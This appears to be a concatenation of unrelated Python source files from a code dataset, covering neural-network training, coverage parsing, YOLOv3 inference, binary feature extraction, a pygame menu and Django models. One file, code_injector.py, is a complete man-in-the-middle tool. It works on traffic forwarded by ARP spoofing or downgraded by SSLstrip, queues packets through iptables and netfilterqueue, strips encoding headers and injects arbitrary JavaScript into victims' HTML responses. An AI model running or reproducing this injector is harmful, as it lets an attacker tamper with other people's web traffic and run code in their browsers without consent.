\"\"\"Feedfoward neural network with 3 hidden layers\"\"\"\n def __init__(self, in_size, hidden_size, out_size):\n super().__init__()\n # hidden layer\n self.linear1 = nn.Linear(in_size, 128)\n # hidden layer2\n self.linear2 = nn.Linear(128, 64)\n # hidden layer3\n self.linear3 = nn.Linear(64, 32)\n #output layer\n self.linear4 = nn.Linear(32, out_size)\n \n \n def forward(self, xb):\n # Flatten the image tensors\n xb = xb.view(xb.size(0), -1)\n # Get intermediate outputs using hidden layer\n out = self.linear1(xb)\n # Apply activation function\n out = F.relu(out)\n # Get intermediate outputs using hidden layer 2\n out = self.linear2(out)\n # Apply activation function\n out = F.relu(out)\n # Get intermediate outputs using hidden layer 3\n out = self.linear3(out)\n # Apply activation function\n out = F.relu(out)\n # Get predictions using output layer\n out = self.linear4(out)\n return out\n \n def training_step(self, batch):\n '''Returns the loss for a batch of training data'''\n images, labels = batch \n out = self(images) # Generate predictions\n loss = F.cross_entropy(out, labels) # Calculate loss\n return loss\n \n def validation_step(self, batch):\n images, labels = batch \n out = self(images) # Generate predictions\n \n loss = F.cross_entropy(out, labels) # Calculate loss\n acc = accuracy(out, labels) # Calculate accuracy\n return {'val_loss': loss, 'val_acc': acc}\n \n def validation_epoch_end(self, outputs):\n '''Takes result from the batches and averages the losses and accuracy to get overall'''\n batch_losses = [x['val_loss'] for x in outputs]\n epoch_loss = torch.stack(batch_losses).mean() # Combine losses\n batch_accs = [x['val_acc'] for x in outputs]\n epoch_acc = torch.stack(batch_accs).mean() # Combine accuracies\n return {'val_loss': epoch_loss.item(), 'val_acc': epoch_acc.item()}\n \n def epoch_end(self, epoch, result):\n print(\"Epoch [{}], val_loss: {:.4f}, val_acc: {:.4f}\".format(epoch, result['val_loss'], result['val_acc']))\n\n\n# In[30]:\n\n\ndef accuracy(outputs, labels):\n _, preds = torch.max(outputs, dim=1)\n return torch.tensor(torch.sum(preds == labels).item() / len(preds))\n\n\n# In[31]:\n\n\ninput_size = 784\nhidden_size = 32 \nnum_classes = 10\n\n\n# In[32]:\n\n\nmodel = MnistModel(input_size, hidden_size=hidden_size, out_size=num_classes)\n\n\n# In[34]:\n\n\nfor images, labels in train_loader:\n outputs = model(images)\n loss = F.cross_entropy(outputs, labels)\n print('Loss:', loss.item())\n break\n\nprint('outputs.shape : ', outputs.shape)\nprint('Sample outputs :\\n', outputs[:2].data)\n\n\n# ## Training the Model\n\n# In[41]:\n\n\ndef evaluate(model, val_loader):\n \"\"\"Evaluate the model's performance on the validation set\"\"\"\n outputs = [model.validation_step(batch) for batch in val_loader]\n return model.validation_epoch_end(outputs)\n\ndef fit(epochs, lr, model, train_loader, val_loader, opt_func=torch.optim.SGD):\n \"\"\"Train the model using gradient descent\"\"\"\n history = []\n optimizer = opt_func(model.parameters(), lr)\n for epoch in range(epochs):\n # Training Phase \n for batch in train_loader:\n loss = model.training_step(batch) \n loss.backward() \n optimizer.step()\n optimizer.zero_grad()\n # Validation phase\n result = evaluate(model, val_loader) \n model.epoch_end(epoch, result)\n history.append(result)\n return history\n\n\n# In[42]:\n\n\nmodel = MnistModel(input_size, hidden_size=hidden_size, out_size=num_classes)\n\n\n# In[43]:\n\n\nhistory = [evaluate(model, val_loader)]\nhistory\n\n\n# In[44]:\n\n\nhistory += fit(5, 0.5, model, train_loader, val_loader)\n\n\n# In[45]:\n\n\nhistory += fit(5, 0.1, model, train_loader, val_loader)\n\n\n# In[46]:\n\n\nhistory += fit(10, 0.05, model, train_loader, val_loader)\n\n\n# In[47]:\n\n\nhistory += fit(20, 0.1, model, train_loader, val_loader)\n\n\n# In[48]:\n\n\nhistory += fit(50, 0.01, model, train_loader, val_loader)\n\n\n# In[49]:\n\n\n# history += fit(30, 0.1, model, train_loader, val_loader)\n\n\n# In[50]:\n\n\n# history += fit(30, 0.001, model, train_loader, val_loader)\n\n\n# In[51]:\n\n\nlosses = [x['val_loss'] for x in history]\nplt.plot(losses, '-x')\nplt.xlabel('epoch')\nplt.ylabel('loss')\nplt.title('Loss vs. No. of epochs');\n\n\n# In[52]:\n\n\naccuracies = [x['val_acc'] for x in history]\nplt.plot(accuracies, '-x')\nplt.xlabel('epoch')\nplt.ylabel('accuracy')\nplt.title('Accuracy vs. No. of epochs');\n\n\n# ## Testing with individual images\n\n# In[53]:\n\n\n# Define test dataset\ntest_dataset = FashionMNIST(root='data/', \n train=False,\n transform=ToTensor())\n\n\n# Define a helper function `predict_image`, which returns the predicted label for a single image tensor.\n\n# In[54]:\n\n\ndef predict_image(img, model):\n yb = model(img)\n _, preds = torch.max(yb, dim=1)\n return preds[0].item()\n\n\n# In[55]:\n\n\nimg, label = test_dataset[5]\nplt.imshow(img[0], cmap='gray')\nprint('Label:', dataset.classes[label], ', Predicted:', dataset.classes[predict_image(img, model)])\n\n\n# In[56]:\n\n\nimg, label = test_dataset[1839]\nplt.imshow(img[0], cmap='gray')\nprint('Label:', label, ', Predicted:', predict_image(img, model))\nprint('Label:', dataset.classes[label], ', Predicted:', dataset.classes[predict_image(img, model)])\n\n\n# In[57]:\n\n\nimg, label = test_dataset[193]\nplt.imshow(img[0], cmap='gray')\nprint('Label:', label, ', Predicted:', predict_image(img, model))\nprint('Label:', dataset.classes[label], ', Predicted:', dataset.classes[predict_image(img, model)])\n\n\n# In[58]:\n\n\nimg, label = test_dataset[9999]\nplt.imshow(img[0], cmap='gray')\nprint('Label:', label, ', Predicted:', predict_image(img, model))\nprint('Label:', dataset.classes[label], ', Predicted:', dataset.classes[predict_image(img, model)])\n\n\n# In[59]:\n\n\nimg, label = test_dataset[67]\nplt.imshow(img[0], cmap='gray')\nprint('Label:', label, ', Predicted:', predict_image(img, model))\nprint('Label:', dataset.classes[label], ', Predicted:', dataset.classes[predict_image(img, model)])\n\n\n# In[60]:\n\n\nimg, label = test_dataset[48]\nplt.imshow(img[0], cmap='gray')\nprint('Label:', label, ', Predicted:', predict_image(img, model))\nprint('Label:', dataset.classes[label], ', Predicted:', dataset.classes[predict_image(img, model)])\n\n","sub_path":"FASHION_MNIST_FFNN.py","file_name":"FASHION_MNIST_FFNN.py","file_ext":"py","file_size_in_byte":9374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"613368740","text":"# -*- coding: utf-8 -*-\nimport glob, os\nfrom bs4 import BeautifulSoup\nimport collections\nfrom tqdm import tqdm\nfrom os import walk\n\n\ntopList = []\n\nclass nodeScore(object):\n \"\"\"docstring for nodeScore.\"\"\"\n def __init__(self, name, numbLine, lineNum, code=None):\n super(nodeScore, self).__init__()\n tmpName = name.replace(\"example-html-details.\", \"\")\n tmpName = tmpName.replace(\".html\", \"\")\n tmpNameList = tmpName.split(\"_\",1)\n name = tmpNameList[0]+\"/\"+tmpNameList[1]\n self.name = name\n self.lineNum = int(lineNum)\n self.numbLine = int(numbLine)\n self.code = code\n\n def __hash__(self):\n return hash(('title', self.name,\n 'lineNum', self.lineNum,\n 'numberLine', self.numbLine))\n\n def __str__(self):\n return (\"\\nName of File \" + str(self.name) + \"\\nLine Number: \" +str( self.lineNum) +\"\\nNumber of Line Executed: \"+ str( self.numbLine) + \"\\nCode : \" + str(self.code))\n\n def print_auto(self):\n return (str(self.name) + \" \" + str(self.lineNum) + \" \" + str(self.numbLine) + \" \" + str(self.code))\n\n def __val__(self):\n return self.name. self.lineNum, self.numbLine\n\n def __get_numbLine(self):\n return int(self.numbLine)\n\n\n\n#get_files function return relative path of html files that are generated by gcovr\ndef get_files():\n fileP = []\n for (dirpath, dirnames, filenames) in walk(\"./\"):\n fileP.extend(filenames)\n break\n print(\"Number of gcov files are \" + str(len(fileP)))\n return fileP\n\n#Analyze data from a file\ndef analyze_file(file, c_list, emptyList): #file is path, fullDict is tuple dictionary and emptyList is empty Dict that has no covered line\n soup = BeautifulSoup(open(file), features=\"lxml\")\n myTr = soup.findAll(\"tr\")\n coveredLine = []\n for tr in myTr:\n if tr.find(\"td\", {\"class\":\"linecount coveredLine\"}) is not None and tr.find(\"td\", {\"class\": \"src coveredLine\"}) is not None:\n coveredLine.append(tr)\n\n # class object list \n if not coveredLine:\n emptyList.append(os.path.basename(file))\n return c_list,emptyList\n else:\n for line in coveredLine:\n if \"for (\" in str(line.find(\"td\", {\"class\": \"src coveredLine\"})):\n c_list.append(nodeScore(file, int(line.find(\"td\", {\"class\": \"linecount coveredLine\"}).string), int(line.find(\"td\", {\"class\": \"lineno\"}).string), str(line.find(\"td\", {\"class\": \"src coveredLine\"}).string).strip()))\n return c_list, emptyList\n\n#Function that writes data 2 a file\ndef write_2_file(tempList):\n with open(\"/home/parallels/Desktop/ffmpeg_source/output_original_gcov.txt\", \"w\") as f:\n for val in tempList:\n if \"aac\" in val.name:\n continue\n else:\n f.write(str(val.print_auto())+\"\\n\")\n\n\nif __name__ == \"__main__\":\n TEST = False\n if TEST == True:\n print(\"Testing\")\n else:\n fileP = get_files()\n\n # print(os.path.basename(\"./libavutil/libavutil-html-details.buffer.c.html\")\n emptyList = []\n random = 0\n c_list = []\n\n for file in tqdm(fileP):\n c_list, emptyList = analyze_file(file, c_list, emptyList)\n\n c_list.sort(key=lambda e: int(e.numbLine), reverse=True)\n # c_list.sort(key=lambda e: e.numbLine, reverse=True)\n #Printing it to file\n write_2_file(c_list)\n\n#ffmpeg -i ~/Desktop/Parallels\\ Shared\\ Folders/Home/Desktop/y2mate.com\\ -\\ hearts_colors_lion_fzcQxRr1cSw_1080p.mp4 -vcodec copy -acodec copy ./filename.avi","sub_path":"gcov_analysis.py","file_name":"gcov_analysis.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"501094082","text":"from xml.dom import minidom\n\ndoc = minidom.parse('bookstore.xml')\n# doc.documentElement方式找到第一个标签(通常情况下)\nroot = doc.documentElement\nprint(type(root), root.nodeName)\n# 可以使用dir看root有哪些方法可以用\n# print(dir(root))\nbooks = root.getElementsByTagName('book')\nfor book in books:\n titles = book.getElementsByTagName('title')\n prices = book.getElementsByTagName('price')\n # 由于title和price都只有一个SubNode也就是标签中值\n # 并且每个book也只有一个title和price\n # 内容节点的变量类型都是str\n print(titles[0].childNodes[0].nodeValue, prices[0].childNodes[0].nodeValue)\n# 输出\n# bookstore\n# Harry Potter 29.99\n# Learn XML 75","sub_path":"elem/xml_dom.py","file_name":"xml_dom.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"444198897","text":"#! /usr/bin/env python\n# coding=utf-8\n# ================================================================\n# Copyright (C) 2019 * Ltd. All rights reserved.\n#\n# Editor : VIM\n# File name : image_demo.py\n# Author : YunYang1994\n# Created date: 2019-07-12 13:07:27\n# Description :\n#\n# ================================================================\n\nimport cv2\nimport time\nimport os\nimport numpy as np\nimport core.utils as utils\nimport tensorflow as tf\nfrom core.yolov3 import YOLOv3, decode\nfrom PIL import Image\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\n\ninput_size = 416\nimage_path = \"./docs/kite.jpg\"\n\ninput_layer = tf.keras.layers.Input([input_size, input_size, 3])\nfeature_maps = YOLOv3(input_layer)\n\noriginal_image = cv2.imread(image_path)\noriginal_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)\noriginal_image_size = original_image.shape[:2]\n\nimage_data, old_image_size, new_image_size = utils.image_preprocess(np.copy(original_image), [input_size, input_size])\nimage_data = image_data[np.newaxis, ...].astype(np.float32)\n\nimage_data = np.tile(image_data, [1, 1, 1, 1])\n\nbbox_tensors = []\nfor i, fm in enumerate(feature_maps):\n bbox_tensor = decode(fm, i)\n bbox_tensors.append(bbox_tensor)\n\nmodel = tf.keras.Model(input_layer, bbox_tensors)\nutils.load_weights(model, \"yolov3.weights\")\n# model.summary()\n\npred_bbox = model.predict(image_data)\n# pred_bbox = model.predict_on_batch(image_data)\npred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]\npred_bbox = tf.concat(pred_bbox, axis=0)\nbboxes = utils.postprocess_boxes(pred_bbox, old_image_size, new_image_size, 0.3)\nbboxes = utils.nms(bboxes, 0.45, method='nms')\n\nimage = utils.draw_bbox(original_image, bboxes)\nimage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n# cv2.imwrite(\"./kite_pred.jpg\", image)\n\ncv2.imshow(\"predicted image\", image)\n# Load and hold the image\ncv2.waitKey(0)\n# To close the window press any key\ncv2.destroyAllWindows()\n","sub_path":"YOLOv3/image_demo.py","file_name":"image_demo.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"238994501","text":"#!/home/xianglin/.virtualenvs/angr/bin/ python\n# -*- coding: utf-8 -*-\n__Auther__ = 'xianglin'\n\nimport angr\nimport capstone\nimport claripy\nimport numpy as np\nfrom tools.image import Image\nfrom tools.util.asm import is_jump\n\n\"\"\"\nit is based on ARM64 instruction set, might add more CPU arch in the future\n\"\"\"\n######################################################################\n# numeric feature\n######################################################################\ndef get_consts(img, insn, offset):\n \"\"\"\n get const from an instruction\n if op is in call function, pass\n else: if it is an imm, check if it is an addr or numeric\n else [mem]\n\n Args:\n insn:(capstone.insn) an instuction\n offset(int): the i-th operand\n\n Returns:\n string_consts(list):\n numeric_consts(list):\n \"\"\"\n string_consts = []\n numeric_consts = []\n insn = insn.insn\n arm64_CI = {'b', 'bl', 'cbz', 'cbnz', 'tbz', 'tbnz'}\n op_imm = {'ARM_OP_IMM', 'ARM64_OP_IMM', 'X86_OP_IMM', 'MIPS_OP_IMM'}\n op_mnemonic = insn.mnemonic\n # if mnemonic is in call functions, return\n if check_type(op_mnemonic, arm64_CI):\n return string_consts, numeric_consts\n\n base_pointer = {'pc'}\n operand = insn.operands[offset]\n op_type = operand.type\n # if it is an immediate value, output the value\n # contingent across all arch\n if op_type == capstone.arm64.ARM64_OP_IMM:\n # if adr, then string/numeric?, else numeric\n if check_type(op_mnemonic, {'adr'}):\n # turn int to addr hex\n bvv = claripy.BVV(operand.value.imm, 64)\n addr = bvv.args[0]\n string_const = get_string(img, addr)\n if string_const is None:\n numeric_const = get_numeric(img, addr)\n numeric_consts.append(numeric_const)\n else:\n string_consts.append(string_const)\n else:\n numeric_consts.append(operand.value.imm)\n # [mem]\n elif op_type == capstone.arm64.ARM64_OP_MEM:\n if operand.value.mem.base != 0:\n base_reg = insn.reg_name(operand.value.mem.base)\n if base_reg in base_pointer:\n disp = operand.value.mem.disp\n addr = insn.address + disp\n numeric_const = get_numeric(img, addr)\n numeric_consts.append(numeric_const)\n\n return string_consts, numeric_consts\n\n\ndef get_BB_consts(img, block):\n \"\"\"\n get string and numeric consts from a block\n Args:\n img(tools.image.Image)\n block: angr.block\n\n Returns:\n string_consts(list): string consts from a block\n numeric_consts(list): numeric consts from a block\n\n \"\"\"\n string_consts = []\n numeric_consts = []\n cs = block.capstone\n insns = cs.insns\n for insn in insns:\n num_operands = len(insn.operands)\n for offset in range(num_operands):\n strings, numerics = get_consts(img, insn, offset)\n string_consts += strings\n numeric_consts += numerics\n\n return string_consts, numeric_consts\n\n\ndef cal_insts(block):\n \"\"\"calculate the number of instructions in a block\"\"\"\n return block.instructions\n\n\ndef cal_transfer_insts(block):\n arm_TI = {'mvn', \"mov\"}\n num = 0\n cs = block.capstone\n insns = cs.insns\n for insn in insns:\n op_type = insn.insn.mnemonic\n if check_type(op_type, arm_TI):\n num = num + 1\n return num\n\n\ndef cal_call_insts(block):\n arm64_CI = {'b', 'bl', 'cbz', 'cbnz', 'tbz', 'tbnz'}\n num = 0\n cs = block.capstone\n insns = cs.insns\n for insn in insns:\n op_type = insn.insn.mnemonic\n if check_type(op_type, arm64_CI):\n num = num + 1\n return num\n\n\ndef cal_arithmetic_insts(block):\n arm64_AI = {'add', 'sub', 'adc', 'sbc'}\n num = 0\n cs = block.capstone\n insns = cs.insns\n for insn in insns:\n op_type = insn.insn.mnemonic\n if check_type(op_type, arm64_AI):\n num = num + 1\n return num\n\n\ndef get_BB_features(img, block):\n \"\"\"get block attributes, without offspring\"\"\"\n fea = []\n strings, consts = get_BB_consts(img, block)\n # 1 strings const\n fea.append(len(strings))\n # 2 numeric const\n fea.append(len(consts))\n # 3 transfer inst\n tran = cal_transfer_insts(block)\n fea.append(tran)\n # 4 calls\n calls = cal_call_insts(block)\n fea.append(calls)\n # 5 inst\n insts = cal_insts(block)\n fea.append(insts)\n # 6 arithmetic\n arti = cal_arithmetic_insts(block)\n fea.append(arti)\n # 7 offspring\n\n return fea\n\n\ndef get_func_fea(bin, func_name):\n \n node_num = 0\n\n img = Image(bin)\n\n entry_base = img.get_symbol_addr(func_name)\n if not entry_base:\n return\n func_cfg = img.get_cfg(func_name)\n func_cfg.normalize()\n all_nodes = []\n for n in func_cfg.nodes():\n if n.function_address == entry_base:\n all_nodes.append(n)\n node_num = node_num + 1\n all_nodes.sort(key=lambda CFGNodeA: CFGNodeA.addr)\n\n X_input = np.zeros((node_num, 7))\n node_mask = np.zeros((node_num, node_num))\n\n for u in range(len(all_nodes)):\n fea = get_BB_features(img, all_nodes[u].block)\n offs = 0\n for succ in all_nodes[u].successors:\n if succ.function_address == entry_base:\n offs += 1\n succ_index = all_nodes.index(succ)\n node_mask[u, succ_index] = 1\n fea.append(offs)\n X_input[u, :] = np.array(fea)\n\n return X_input, node_mask\n\n\n######################################################################\n# other functions\n######################################################################\ndef check_type(t, t_set):\n \"\"\"\n Args:\n t(str): operator or register\n t_set(set): check type set\n\n Returns:\n states(boolean): true if t is in t_set\n\n \"\"\"\n for t_type in t_set:\n if t.startswith(t_type):\n return True\n return False\n\n\ndef get_string(img, addr):\n string = \"\"\n for i in range(1000):\n c = img.project.loader.memory.load(addr + i, 1)\n if ord(c) == 0:\n break\n elif 40 <= ord(c) < 128:\n string += chr(ord(c))\n else:\n return None\n return string\n\n\ndef get_numeric(img, addr):\n b = img.project.loader.memory.load(addr, 4)\n num = int.from_bytes(b, \"little\")\n return num\n\n\nif __name__ == \"__main__\":\n bin = \"/home/xianglin/PycharmProjects/genius/testcase/2423496af35d94a87156b063ea5cedffc10a70a1/vmlinux\"\n func_name = \"dccp_rcv_state_process\"\n i, j = get_func_fea(bin, func_name)\n","sub_path":"NumericFeatureExtractor.py","file_name":"NumericFeatureExtractor.py","file_ext":"py","file_size_in_byte":6641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"424776291","text":"# %load q05_create_bowler_filter/build.py\n# Default imports\nfrom greyatomlib.pandas_project.q01_read_csv_data_to_df.build import read_csv_data_to_df\n\n# You have been given dataset already in 'ipl_df'.\nipl_df = read_csv_data_to_df(\"./data/ipl_dataset.csv\")\n\n# Solution\n\ndef create_bowler_filter(bowler):\n bowler_Series=ipl_df['bowler']\n bowler_filter =bowler_Series==bowler\n #bowler_Series_filter=bowler_Series[bowler_filter]\n #print(type(bowler_filter))\n return bowler_filter\n","sub_path":"q05_create_bowler_filter/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"644993299","text":"import pygame\nimport functions\nimport pyautogui\nimport input_box\nimport os\n\npygame.init()\nscreen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\nscreen_width, screen_height = pyautogui.size()\n\nfolder_path_box = input_box.input_box(screen_width/3.2, screen_height/4, 200, 50, text='', updatable=True, save_responsive=True)\nfile_extension = input_box.input_box(screen_width/3.2, screen_height/2.8, 200, 50, text='', updatable=True, save_responsive=True)\nget_all_extensions_button = input_box.input_box(screen_width/3.2, screen_height/2.15, 200, 50, text='get files with all extensions', updatable=False, save_responsive=False)\nconfirm_button = input_box.input_box(screen_width/2.85, screen_height/1.41, 200, 50, text='here', updatable=False, save_responsive=True)\ninreasing_button = input_box.input_box(screen_width/3.2, screen_height/1.74, 200, 50, text='increasing', updatable=False, save_responsive=False)\ndecreasing_button = input_box.input_box(screen_width/2.43, screen_height/1.74, 200, 50, text='decreasing', updatable=False, save_responsive=False)\n\nclass menu:\n def __init__(self):\n self.active = True\n self.rect = pygame.Rect(screen_width/3.3, screen_height/4.8, 1, screen_height/1.87)\n\n def check_path_input(self):\n try:\n os.listdir(folder_path_box.text)\n return True\n except FileNotFoundError and OSError:\n functions.write_text(\"Warning: path not found.\", 30, (255, 112, 77), screen_width / 5.6, screen_height / 3.9, screen)\n return False\n\n def handle_events(self):\n while self.active == True:\n screen.fill((230, 242, 255))\n pygame.draw.rect(screen, (255, 102, 102), self.rect, 2)\n self.check_path_input()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE) or confirm_button.active == True and self.check_path_input() == True:\n self.active = False\n\n if decreasing_button.active == False:\n inreasing_button.handle_event(event)\n if inreasing_button.active == False:\n decreasing_button.handle_event(event)\n\n folder_path_box.handle_event(event)\n confirm_button.handle_event(event)\n file_extension.handle_event(event)\n get_all_extensions_button.handle_event(event)\n\n functions.write_text(\"Where should I look for files?\", 40, (255, 102, 102), screen_width/3.2, screen_height/5, screen)\n functions.write_text(\"Files extension:\", 40, (255, 102, 102), screen_width / 3.2, screen_height / 3.25, screen)\n functions.write_text(\"If you want to sort files with all extensions, click\", 40, (255, 102, 102), screen_width / 3.2, screen_height / 2.4, screen)\n functions.write_text(\"Date of modification should be increasing or decreasing?\", 40, (255, 102, 102), screen_width / 3.2, screen_height / 1.9, screen)\n functions.write_text(\"Click\", 40, (255, 102, 102), screen_width / 3.2, screen_height / 1.4, screen)\n functions.write_text(\"if you are ready.\", 40, (255, 102, 102), screen_width / 2.58, screen_height / 1.4, screen)\n\n inreasing_button.update()\n decreasing_button.update()\n folder_path_box.update()\n confirm_button.update()\n file_extension.update()\n get_all_extensions_button.update()\n\n inreasing_button.draw(screen)\n decreasing_button.draw(screen)\n folder_path_box.draw(screen)\n confirm_button.draw(screen)\n file_extension.draw(screen)\n get_all_extensions_button.draw(screen)\n\n pygame.display.update()\n","sub_path":"menu_loop.py","file_name":"menu_loop.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"465328999","text":"###############################################################################\r\n#\r\n# Title: Fargo\r\n# Author: Qzofp Productions\r\n# Version: 0.5\r\n#\r\n# File: fargo.py\r\n#\r\n# Created on Jun 18, 2014\r\n# Updated on Jun 19, 2014\r\n#\r\n# Description: Export addon configuration to the fargo.addon.settings.js file.\r\n#\r\n###############################################################################\r\n\r\nimport xbmcaddon\r\nimport xbmcgui\r\n\r\n__settings__ = xbmcaddon.Addon(\"webinterface.fargo\")\r\ncWeb = __settings__.getSetting(\"website\")\r\ncPath = xbmc.translatePath(__settings__.getAddonInfo('path'))\r\ncFilename = 'fargo.addon.settings.js'\r\n\r\ncFile = os.path.join(cPath, cFilename)\r\n\r\nFileHandler = open(cFile, 'w')\r\nFileHandler.write('var cFARGOSITE = \"' + cWeb + '\";')\r\nFileHandler.close()\r\n\r\nxbmcgui.Dialog().ok(\"Fargo Export\", \"Web Site Address successfully exported.\")","sub_path":"_xbmc_addon/webinterface.fargo/resources/lib/fargo.py","file_name":"fargo.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"625754979","text":"import netfilterqueue\nfrom scapy.layers.l2 import Raw\nfrom scapy.layers.inet import IP, TCP\nimport argparse\nimport os\nfrom termcolor import cprint\nimport re\n\nEND_TAG = '' #TAG to be replaced in HTML load\nSCRIPT_TAG = '' #TAG to be insert in HTML load\nPORT = 80 #PORT for detection of packets (80 HTTP, 10000 HTTPS with SSLstrip)\nLINE = '____________________________________________________________'\n\n\ndef process_packet(packet):\n '''\n Process each packet on Network filter queue\n '''\n\n global PORT\n #Evaluate IP packet filtered\n IP_pkt = IP(packet.get_payload())\n \n #If the IP packet has TCP layer and Raw Layer (it can be HTTP packet)\n if IP_pkt.haslayer(Raw) and IP_pkt.haslayer(TCP):\n try:\n #Decode load of TCP packet\n load = IP_pkt[Raw].load.decode()\n \n #IP packet from the victim to the server\n #destination port = 80 (port of HTTP server)\n if IP_pkt[TCP].dport == PORT:\n cprint('Request', 'red', attrs=['bold',])\n \n '''Search for Accept-Encoding Header (?\\\\r\\\\n = stop at first occurrence of \\\\r\\\\n)\n Remove Accept-Encoding header from request(we don't understand any encoding)\n Remove also Chunked-Encoding by using HTTP/1.0\n '''\n load = re.sub('Accept-Encoding:.*?\\\\r\\\\n', '', load)\n load = load.replace('HTTP/1.1', 'HTTP/1.0')\n IP_pkt[Raw].load = load\n\n #Scapy recomputes them\n del IP_pkt[IP].len\n del IP_pkt[IP].chksum\n del IP_pkt[TCP].chksum\n\n packet.set_payload(bytes(IP_pkt))\n\n #IP packet from the server to the victim\n #source port = 80 (port of HTTP server)\n elif IP_pkt[TCP].sport == PORT:\n cprint('Response', 'blue', attrs=['bold',])\n load = injection_code(load)\n\n IP_pkt[Raw].load = load\n \n #Scapy recomputes them\n del IP_pkt[IP].len\n del IP_pkt[IP].chksum\n del IP_pkt[TCP].chksum\n\n packet.set_payload(bytes(IP_pkt))\n \n except UnicodeDecodeError:\n #If python convertion (decode) fails for some bytes\n #(No HTML code, so I don't want to analyse this packet)\n pass\n \n packet.accept()\n\ndef injection_code(load):\n '''\n Injection of javascript code in HTML load\n '''\n\n global END_TAG, SCRIPT_TAG\n\n #If the HTML page has TAG, I'm going to replace it with javascript code\n load = load.replace(END_TAG, SCRIPT_TAG+END_TAG)\n #If ?: for group (), group used to locate expression but it's not stored in expression\n content_length_header = re.search(\"(?:Content-Length:\\s)(\\d*)\", load)\n\n if content_length_header and 'text/html' in load:\n content_length = content_length_header.group(1)\n print(f'Length {content_length}', end='')\n new_length = int(content_length) + len(SCRIPT_TAG)\n print(f' {new_length}')\n load = load.replace(content_length, str(new_length))\n print(f' {load}')\n\n return load\n\n\ndef args_parser():\n '''\n Parser of command line argument\n '''\n\n global SCRIPT_TAG\n \n #Parser of command line arguments\n parser = argparse.ArgumentParser()\n\n #Initialization of needed arguments\n parser.add_argument(\"-local\", \"-l\", dest=\"local\", help=\"If specified, IPTABLES updated to run program on local. Otherwise it works on forward machine (e.g. with arp spoofing).\", action='store_true')\n parser.add_argument(\"-file\", \"-f\", dest=\"file\", help=\"Name of javascript file to use.\")\n parser.add_argument(\"-https\", dest=\"https\", help=\"If specified, it bypass HTTPS connection. Otherwise, it works on HTTP connection.\", action='store_true')\n\n #Parse command line arguments\n args = parser.parse_args()\n\n if args.file and os.path.exists(args.file) and os.path.isfile(args.file) and ('.js') in args.file:\n f = open(args.file, 'r')\n code = f.read().replace('\\n', '')\n SCRIPT_TAG = SCRIPT_TAG.replace('CODE', code)\n print(SCRIPT_TAG)\n else:\n cprint('\\n\\n[ERROR] Missing file', 'red', attrs=['bold',], end='\\n\\n')\n parser.print_help()\n exit(1)\n\n return args.local, args.https\n\ndef main():\n global PORT\n local, https = args_parser()\n\n #Packets are blocked and not forwarded\n if local or https:\n os.system('iptables -F')\n os.system('iptables -I INPUT -j NFQUEUE --queue-num 0')\n os.system('iptables -I OUTPUT -j NFQUEUE --queue-num 0')\n \n if https:\n os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000')\n \n else:\n os.system('iptables -F')\n os.system('iptables -I FORWARD -j NFQUEUE --queue-num 0')\n\n if https:\n PORT = 10000\n\n #queue num = 0\n queue = netfilterqueue.NetfilterQueue()\n queue.bind(0, process_packet)\n\n try:\n cprint(f'\\nTCP packets\\n{LINE}','green', attrs=['bold',])\n queue.run()\n except KeyboardInterrupt:\n queue.unbind()\n cprint(f'\\n{LINE}','green', attrs=['bold',])\n print('Flushing ip table.', end='\\n')\n cprint(f'{LINE}','green', attrs=['bold',], end='\\n\\n')\n os.system('iptables -F')\n\n\nif __name__=='__main__':\n\tmain()\n","sub_path":"Hacking/code_injector/code_injector.py","file_name":"code_injector.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"228604861","text":"from django.db import models\n\nDEFAULT_RANKING = 1000\n\n# Create your models here.\n\nclass Player(models.Model):\n first_name = models.CharField(max_length=100)\n last_name = models.CharField(max_length=100)\n ranking = models.IntegerField(default=DEFAULT_RANKING)\n\n\nclass Game(models.Model):\n first_player = models.ForeignKey(Player, related_name='first_player')\n second_player = models.ForeignKey(Player, related_name='second_player')\n # encode the result somehow\n date = models.DateTimeField('day played')\n result = models.BooleanField() # make it a custom field\n\n\n# add as many things as possible to the model or not??\n","sub_path":"results/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"376075105","text":"import argparse\nimport json\nimport os\nimport socket\n\nimport logging\nfrom time import sleep\n\nimport requests\n\nfrom cua import Queue, Config\n\nlogger = logging.getLogger('newrelic_counter_queue')\nnewrelic_guid = \"com.webgeoservices.counter_queue\"\n\ndef parse_config_file(config_file):\n config_values = {}\n try:\n config = open(config_file, 'r')\n except IOError:\n logger.error(\"newrelic sysmond config file is unreachable\")\n return False\n else:\n for line in config.readlines():\n if line[0] != \"#\" and len(line.strip()) != 0:\n config_var = line.split(\"=\")\n config_values[config_var[0].strip()] = config_var[1].strip()\n config.close()\n return config_values\n\n\ndef set_environment_variables(config_values):\n if \"NEWRELIC_LICENCE_KEY\" not in os.environ:\n 